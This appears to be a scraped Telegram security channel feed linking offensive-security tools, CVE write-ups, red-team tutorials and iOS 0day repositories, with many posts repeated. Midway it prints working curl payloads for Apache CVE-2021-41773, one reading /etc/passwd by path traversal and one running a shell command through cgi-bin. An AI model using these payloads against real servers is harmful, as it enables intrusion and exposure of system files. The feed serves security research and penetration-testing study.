This media is not supported in your browser
VIEW IN TELEGRAM
reconFTW
ReconFTW automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
https://github.com/six2dez/reconftw
#reconFTW #bugbounty #hacking
ReconFTW automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
https://github.com/six2dez/reconftw
#reconFTW #bugbounty #hacking
How to Create an Internal/Corporate Red Team
https://malcomvetter.medium.com/how-to-create-an-internal-corporate-red-team-1023027ea1e3
#redteam
https://malcomvetter.medium.com/how-to-create-an-internal-corporate-red-team-1023027ea1e3
#redteam
Medium
How to Create an Internal/Corporate Red Team
Congratulations! Your organization has approved the creation of an internal Red Team program and tasked you to do it! Here are some quick…
CVE-2021-22005 - VMWare vCenter Server File Upload to RCE
https://github.com/r0ckysec/CVE-2021-22005
#cve #vCenter #RCE
https://github.com/r0ckysec/CVE-2021-22005
#cve #vCenter #RCE
Forwarded from PT SWARM
New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings"
Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers
Nikita Abramov & Mikhail Klyuchnikov:
https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers
Nikita Abramov & Mikhail Klyuchnikov:
https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
GOAD (Game Of Active Directory)
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environement ready to use to practice usual attack techniques.
https://github.com/Orange-Cyberdefense/GOAD
#ActiveDirectory #AD #Microsoft #Pentest #vulnerabilites
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environement ready to use to practice usual attack techniques.
https://github.com/Orange-Cyberdefense/GOAD
#ActiveDirectory #AD #Microsoft #Pentest #vulnerabilites
APT
Offensive WMI (Part 3) https://0xinfection.github.io/posts/wmi-registry-part-3/ #wmi
Offensive WMI - Reconnaissance & Enumeration (Part 4)
This post focuses on interacting with several WMI classes to extract useful and sensitive information
https://0xinfection.github.io/posts/wmi-recon-enum/
#wmi
This post focuses on interacting with several WMI classes to extract useful and sensitive information
https://0xinfection.github.io/posts/wmi-recon-enum/
#wmi
0xInfection's Blog
Offensive WMI - Reconnaissance & Enumeration (Part 4)
This is the fourth part of the “Offensive WMI” series which will focus a bit more on information gathering and enumeration. WMI provides a plethora of classes from which we can enumerate a lot of stuff. So let’s dive in without wasting any more time.
Gathering…
Gathering…
Information Gathering and Scanning for Sensitive Information
https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e
#OSINT #Recon
https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e
#OSINT #Recon
Medium
Information Gathering&scanning for sensitive information[ Reloaded ]
Testing Web-Application/Network , Information Gathering is important before we test for vulnerability on the target?
iOS 15 0day Exploits
https://github.com/illusionofchaos/ios-gamed-0day
https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day
https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day
#ios #0day #exploit
https://github.com/illusionofchaos/ios-gamed-0day
https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day
https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day
#ios #0day #exploit
GitHub
GitHub - illusionofchaos/ios-gamed-0day: iOS gamed exploit (fixed in 15.0.2)
iOS gamed exploit (fixed in 15.0.2). Contribute to illusionofchaos/ios-gamed-0day development by creating an account on GitHub.
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
https://twitter.com/ducnt_/status/1445386557574324234
#cve #apache
Twitter
Nguyen The Duc
Just got worked exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀
APT
Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773) https://twitter.com/ducnt_/status/1445386557574324234 #cve #apache
Payload
curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
APT
Payload curl https://URL/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -k
Apache 2.4.49 Payload RCE
curl --data "echo;id" 'https://127.0.0.1:55026/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'Certipy
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
Python implementation for Active Directory certificate abuse
https://github.com/ollypwn/Certipy
#ADCS
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from PT SWARM
CVE-2021-26420: Remote Code Execution in Sharepoint via workflow compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
👤 by The ZDI Research Team
In June of 2021, Microsoft released a patch to correct CVE-2021-26420 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI-21-755. This blog takes a deeper look at the root cause of this vulnerability.
This vulnerability could be used by an authenticated user to execute arbitrary .NET code on the server in the context and permissions of the service account of a SharePoint web application. For a successful attack, the attacker should have “Manage Lists” permissions on any SharePoint site. By default, any authenticated user can create their own site where they have the necessary permissions.
📝 Contents:
• The Vulnerability
• Proof of Concept
• Achieving Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/10/5/cve-2021-26420-remote-code-execution-in-sharepoint-via-workflow-compilation
Zero Day Initiative
Zero Day Initiative — CVE-2021-26420: Remote Code Execution in SharePoint via Workflow Compilation
In June of 2021, Microsoft released a patch to correct CVE-20 21-264 20 – a remote code execution bug in the supported versions of Microsoft SharePoint Server. This bug was reported to the ZDI program by an anonymous researcher and is also known as ZDI…
Jir-thief
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
GitHub
GitHub - antman1p/Jir-Thief: A Red Team tool for exfiltrating sensitive data from Jira tickets.
A Red Team tool for exfiltrating sensitive data from Jira tickets. - antman1p/Jir-Thief
Conf-thief
A Red Team tool for exfiltrating sensitive data from Confluence pages
https://github.com/antman1p/Conf-Thief
#confluence #redteam
A Red Team tool for exfiltrating sensitive data from Confluence pages
https://github.com/antman1p/Conf-Thief
#confluence #redteam
GitHub
GitHub - antman1p/Conf-Thief: A Red Team tool for exfiltrating sensitive data from Confluence pages.
A Red Team tool for exfiltrating sensitive data from Confluence pages. - antman1p/Conf-Thief
0-Day Hunting (Chaining Bugs/Methodology)
https://blog.riotsecurityteam.com/0day-chains
#0day #methodology
https://blog.riotsecurityteam.com/0day-chains
#0day #methodology
Red Team Tutorials
# https://crypt0jan.medium.com/red-team-tutorials-1-fcc509da20c4
# https://crypt0jan.medium.com/red-team-tutorials-2-e1b86016e231
# https://crypt0jan.medium.com/red-team-tutorials-3-351e76ea796d
# https://crypt0jan.medium.com/red-team-tutorials-4-616c565ccec9
#redteam #metasploit
# https://crypt0jan.medium.com/red-team-tutorials-1-fcc509da20c4
# https://crypt0jan.medium.com/red-team-tutorials-2-e1b86016e231
# https://crypt0jan.medium.com/red-team-tutorials-3-351e76ea796d
# https://crypt0jan.medium.com/red-team-tutorials-4-616c565ccec9
#redteam #metasploit
Medium
RED TEAM TUTORIALS — №1
By default, Meterpreter creates custom SSL certificates to encrypt traffic between the target and your C2 server if you turn on SSL. However, these custom SSL certificates contain fingerprintable…